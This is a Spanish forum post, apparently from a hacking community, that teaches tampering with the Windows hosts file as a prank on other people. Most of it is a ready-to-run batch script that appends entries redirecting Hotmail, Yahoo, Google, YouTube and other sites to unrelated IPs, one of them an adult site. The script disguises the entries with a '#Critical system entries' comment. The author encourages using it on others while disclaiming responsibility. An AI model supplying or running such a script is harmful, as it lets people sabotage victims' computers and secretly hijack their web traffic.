Buenas a todos otra vez.

Visto el (poco) éxito que tuvo mi anterior aportación sobre el código de ataque a lsass para evitar que el PC pudiera ser apagado, me arriesgo a volver a quedarme solo ante esta nueva explicación tan apañada sobre cómo hacer el gracioso con el archivo de hosts.

Todos conocemos el típico truco de redireccionar a localhost (127.0.0.1) ciertas páginas de intertet para evitar que el usuario las pueda ver. [Claro claro... ¿quién no ha resistido la tentación de hacer esta  inocente  gamberrada para reirse un rato a costa de otro]

Pues bien, si hemos redireccionado alguna vez una página hacia localhost, ¿podríamos redireccionar una página web hacia OTRA página web asignándole a la dirección de la primera la IP de la segunda en el archivo de hosts?

Como probablemente los que no sepan de lo que hablo se hayan perdido, lo explicaré con un ejemplo práctico. (Y el que no sepa qué es el archivo de hosts que se vaya a la wikipedia).

Imaginemos que nuestra página 1 es google.es
La IP de google.es es 216.239.59.104

Ahora, como somos tan inocentes, escogemos como página 2 a zorritas.com
La IP de zorritas.com es 70.86.199.78

[Las IP's se determinan mediante ping en la línea de comandos]

Ahora imaginemos que queremos que al entrar en la página 1 nos redireccione a la página 2. (es decir, que en nuestro navegador pongamos google.es y nos mande, para nuestra grandísima sorpresa, a zorritas.com ¿qué gracia ehh? Seeh, que te lo hagan a ti  ).

En ese caso, la línea del archivo de hosts debería quedar así:

70.86.199.78   google.es

un código en batch capaz de hacerlo es el siguiente:

echo 70.86.199.78   google.es>>"%WINDIR%\System32\drivers\etc\hosts"
[como todos ya deberíamos saber, el archivo de hosts no tiene extensión...]

Por tanto, un verdadero restrictor sería:

@echo off
echo #Critical system entries>>"%WINDIR%\System32\drivers\etc\hosts"
echo 70.86.199.78	hotmail.com>>"%WINDIR%\System32\drivers\etc\hosts"
echo 70.86.199.78	www.hotmail.com>>"%WINDIR%\System32\drivers\etc\hosts"
echo 82.98.86.175	es.mail.yahoo.com>>"%WINDIR%\System32\drivers\etc\hosts"
echo 82.98.86.175	yahoo.com>>"%WINDIR%\System32\drivers\etc\hosts"
echo 72.232.130.44	terra.es>>"%WINDIR%\System32\drivers\etc\hosts"
echo 72.232.130.44	www.terra.es>>"%WINDIR%\System32\drivers\etc\hosts"
echo 66.199.187.181	google.es>>"%WINDIR%\System32\drivers\etc\hosts"
echo 66.199.187.181	www.google.es>>"%WINDIR%\System32\drivers\etc\hosts"
echo 217.113.244.80	google.com>>"%WINDIR%\System32\drivers\etc\hosts"
echo 217.113.244.80	www.google.com>>"%WINDIR%\System32\drivers\etc\hosts"
echo 72.232.197.82	elhacker.net>>"%WINDIR%\System32\drivers\etc\hosts"
echo 72.232.197.82	www.elhacker.net>>"%WINDIR%\System32\drivers\etc\hosts"
echo 64.255.172.50	fotolog.com>>"%WINDIR%\System32\drivers\etc\hosts"
echo 64.255.172.50	www.fotolog.com>>"%WINDIR%\System32\drivers\etc\hosts"
echo 64.255.172.50	youtube.com>>"%WINDIR%\System32\drivers\etc\hosts"
echo 64.255.172.50	www.youtube.com>>"%WINDIR%\System32\drivers\etc\hosts"
echo 208.73.212.12	tibia.com>>"%WINDIR%\System32\drivers\etc\hosts"
echo 208.73.212.12	www.tibia.com>>"%WINDIR%\System32\drivers\etc\hosts"
echo 216.34.131.135	jccm.es>>"%WINDIR%\System32\drivers\etc\hosts"
echo 216.34.131.135	www.jccm.es>>"%WINDIR%\System32\drivers\etc\hosts"
exit
 

Venga, sed buenos y no lo uséis para amargarle el día a vuestra exnovia.

Sobra decir que no me responasbilizo de lo que hagáis con el código. De hecho, sería un poco surrealista que le dijérais al juez: "Señor juez, es que fulanito se responsabilizaba de que yo le jodiera el ordenador a mi hermano...". No, la verdad es que no cuela 
A sí que ya sabéis... bajo vuestra entera responsabilidad.

Hasta otra!

no quieras que te aplaudan con cosas tan lammers de este tipo